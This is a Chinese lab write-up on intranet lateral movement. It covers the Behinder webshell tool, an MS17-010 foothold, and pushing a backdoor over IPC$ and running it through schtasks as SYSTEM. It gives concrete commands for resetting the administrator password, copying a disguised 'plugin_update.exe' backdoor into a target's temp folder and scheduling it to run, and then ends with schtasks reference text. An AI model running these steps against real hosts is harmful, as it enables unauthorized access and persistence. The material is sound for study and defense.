内网安全之横向移动(冰蝎&&msf&&IPC$)

1.冰蝎介绍

冰蝎是一款目前比较流行的Webshell管理工具，因其优秀的加密传输特性，被攻击者广泛采用。冰蝎相较其它Webshell管理工具，具备如下优点：支持跨平台运行、多采用加密传输、版本更新频繁等。新版本增加了Java内存马注入、支持多种Web容器、反向DMZ等功能。

 2.实验

通过获取内网中的主机shell，上传木马，再通过内网主机之间建立IPC$通道实现内网横向移动，并通过windows定时任务执行，获取反弹shell

环境：

kali: 192.168.4.157

win7A:192.168.4.129  1.1.1.10

win7B:1.1.1.11

首先通过ms17-010获取内网win7A的shell

通过获得的shell，与WIN7B建立IPC$通道，

生成远程木马

上传木马到WIN7A

进入win7A的shell通过ipc$通道上传木马至win7B

设置payload进行本地监听此木马，等待反向连接，通过schtasks命令来执行木马

 由于环境出了问题，因为上传的.exe因系统权限，没能成功执行，后期可以上传一些ps,或者其他shell，来获取目标系统的shell，整个人麻木了，这是啥呀。。。。。。。

知识补充：

1.IPC$简介

IPC$(Internet Process Connection)是共享"命名管道"的资源，它是为了让进程间通信而开放的命名管道，通过提供可信任的用户名和口令，连接双方可以建立安全的通道并以此通道进行加密数据的交换，从而实现对远程计算机的访问。

使用条件

1.开放了139、445端口；
2.目标开启ipc$文件共享；
3.获取用户账号密码。

测试过程

此测试前提是获取了ipc$，
这里测试的时候得到的权限是system，然后创建了一个admin账户，给了administrators权限，但无法复制文件过去，于是就改了administrator账户密码（实战中不建议更改，可读取管理密码后再用读到的密码）。
更改密码：net user administrator "1qaz@WSX"

• 1.连接目标ipc$，将后门复制到目标机器上

net use \\193.168.1.12\ipc$ /user:administrator "1qaz@WSX"
copy plugin_update.exe \\193.168.1.12\c$\windows\temp\plugin_update.exe

• 2.创建自动任务，执行上传的后门程序

# 查看目标机器时间
net time \\193.168.1.12
# 创建该时间之后的某个时刻自动执行任务，任务名 plugin_update
schtasks /create /tn "plugin_update" /tr c:\windows\temp\plugin_update.exe /sc once /st 16:32 /S 193.168.1.12 /RU System /u administrator /p "1qaz@WSX"
# 如果不想等，可以立即运行后门程序
schtasks /run /tn "plugin_update" /S 193.168.1.12 /u administrator /p "1qaz@WSX"
# 删除创建的任务
schtasks /F /delete /tn "plugin_update" /S 193.168.1.12 /u administrator /p "1qaz@WSX"

接收端的目标机器已上线。

常用命令

# 1.连接
net use \\193.168.1.12\ipc$ /user:administrator "1qaz@WSX"
# 2.查看连接情况
net use
# 3.查看目标主机共享资源
net view \\193.168.1.12
# 4.查看目标主机时间
net time \\193.168.1.12
# 5.查看目标主机的NetBIOS用户（自己本机也需开启）
nbtstat -A 193.168.1.12
# 6.删除连接
net use \\193.168.1.12\ipc$ /del
# 7.文件上传下载
copy plugin_update.exe \\193.168.1.12\c$\windows\temp\plugin_update.exe   
（上传到目标的:c\windows\temp\目录下）
copy \\127.0.0.1\c$\test.exe c:\
（下载到本地c盘下）
# 8.创建计划任务
schtasks /create /tn "plugin_update" /tr c:\windows\temp\plugin_update.exe /sc once /st 1 6:32 /S 193.168.1.12 /RU System /u administrator /p "1qaz@WSX"
# 9.立即执行计划任务
schtasks /run /tn "plugin_update" /S 193.168.1.12 /u administrator /p "1qaz@WSX"
# 10.删除计划任务
schtasks /F /delete /tn "plugin_update" /S 193.168.1.12 /u administrator /p "1qaz@WSX"

2.schtasks简介

schtasks create    创建新的计划任务。

语法

schtasks /create /tn TaskName /tr TaskRun /sc schedule [/mo modifier] [/d day] [/m month[,month...] [/i IdleTime] [/st StartTime] [/sd StartDate] [/ed EndDate] [/s computer [/u [domain\]user /p password]] [/ru {[Domain\]User | "System"} [/rpPassword]] /?

参数

/tn TaskName         指定任务的名称。

/tr TaskRun             指定任务运行的程序或命令。键入可执行文件、脚本文件或批处理文件的完全合格的路径和文件名。

                               如果忽略该路径，SchTasks.exe 将假定文件在 Systemroot\System32 目录下。

/sc schedule           指定计划类型。有效值为 MINUTE、HOURLY、DAILY、WEEKLY、MONTHLY、ONCE、ONSTART、ONLOGON、ONIDLE。

值说明

MINUTE、HOURLY、DAILY、WEEKLY、MONTHLY
指定计划的时间单位。

ONCE
任务在指定的日期和时间运行一次。

ONSTART
任务在每次系统启动的时候运行。可以指定启动的日期，或下一次系统启动的时候运行任务。

ONLOGON
每当用户（任意用户）登录的时候，任务就运行。可以指定日期，或在下次用户登录的时候运行任务。

ONIDLE
只要系统空闲了指定的时间，任务就运行。可以指定日期，或在下次系统空闲的时候运行任务。

/mo modifier

指定任务在其计划类型内的运行频率。这个参数对于 MONTHLY 计划是必需的。对于 MINUTE、HOURLY、DAILY 或 WEEKLY 计划，这个参数有效，但也可选。默认值为 1。

计划类型
修饰符
说明

MINUTE
1 ～ 1439
任务每 n 分钟运行一次。

HOURLY
1 ～ 23
任务每 n 小时运行一次。

DAILY
1 ～ 365
任务每 n 天运行一次。

WEEKLY
1 ～ 52
任务每 n 周运行一次。

MONTHLY
1 ～ 12
任务每 n 月运行一次。

LASTDAY
任务在月份的最后一天运行。

FIRST、SECOND、THIRD、FOURTH、LAST
与 /d day 参数共同使用,并在特定的周和天运行任务。例如，在月份的第三个周三。

/d dirlist

指定周或月的一天。只与 WEEKLY 或 MONTHLY 计划共同使用时有效。

计划类型
日期值

WEEKLY
可选项。有效值是 MON ~ SUN 和 * （每一天）。MON 是默认值。

MONTHLY
在使用 FIRST、SECOND、THIRD、FOURTH 或 LAST 修饰符 (/mo) 时，需要 MON ～ SUN 中的某个值。1 ～ 31 是可选的，只在没有修饰符或修饰符为 1 ～ 12 类型时有效。默认值是 1 （月份的第一天）。

/m month[,month...]

指定一年中的一个月。有效值是 JAN ～ DEC 和 * （每个月）。/m 参数只对于 MONTHLY 计划有效。在使用 LASTDAY 修饰符时，这个参数是必需的。否则&#x